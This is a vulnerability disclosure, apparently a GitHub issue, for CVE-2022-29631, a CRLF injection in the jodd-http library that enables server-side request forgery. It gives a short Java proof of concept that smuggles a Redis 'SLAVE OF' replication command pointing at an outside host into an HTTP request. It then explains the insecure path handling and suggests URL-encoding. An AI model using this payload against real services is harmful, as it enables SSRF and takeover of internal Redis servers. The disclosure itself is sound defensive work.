Headline
CVE-2022-29631: CRLF injection vulnerability in jodd-http · Issue #9 · oblac/jodd-http
Jodd HTTP v6.0.9 was discovered to contain multiple CLRF injection vulnerabilities via the components jodd.http.HttpRequest#set and `jodd.http.HttpRequest#send. These vulnerabilities allow attackers to execute Server-Side Request Forgery (SSRF) via a crafted TCP payload.
CRLF injection vulnerability in jodd-http
CRLF injection vulnerability in jodd.http.HttpRequest#set and jodd.http.HttpRequest#send in jodd-http version 5.0.x , 5.1.x , 5.2.x , 6.0.x , 6.1.x , 6.2.x ( all versions so far ) , allows remote attackers to inject arbitrary TCP payload via CRLF sequences in a URL .
Proof of concept :
<dependency\>
<groupId\>org.jodd</groupId\>
<artifactId\>jodd-http</artifactId\>
<version\>6.2.0</version\>
</dependency\>
package top.inhann;
import jodd.http.HttpRequest; import jodd.http.HttpResponse;
public class Test { public static void main(String[] args) { String url = "http://127.0.0.1:6379/ HTTP/1.1\r\nHost: 127.0.0.1:6379\r\n\r\nSLAVE OF inhann.top:6379\r\n\r\nPOST / "; HttpRequest req = HttpRequest.get(url); HttpResponse res = req.send(); } }
run the poc , listen on 127.0.0.1:6379
details :
in jodd.http.HttpRequest#set() when processing path ,this.path(destination); is called ,and it is allowed to inject \r\n in query string and path and fragment .
in jodd.http.HttpRequest#sendTo() , this.buffer(true); is called , and trying to build the http request payload . However , the path , query string , frament and othor components are just appended insecurely , which leads to the crlf injection .
suggestion :
it is recommended to urlencode the invalid characters when constructing the http request payload .
Related news
Jodd HTTP v6.0.9 was discovered to contain multiple CLRF injection vulnerabilities via the components jodd.http.HttpRequest#set and `jodd.http.HttpRequest#send. These vulnerabilities allow attackers to execute Server-Side Request Forgery (SSRF) via a crafted TCP payload.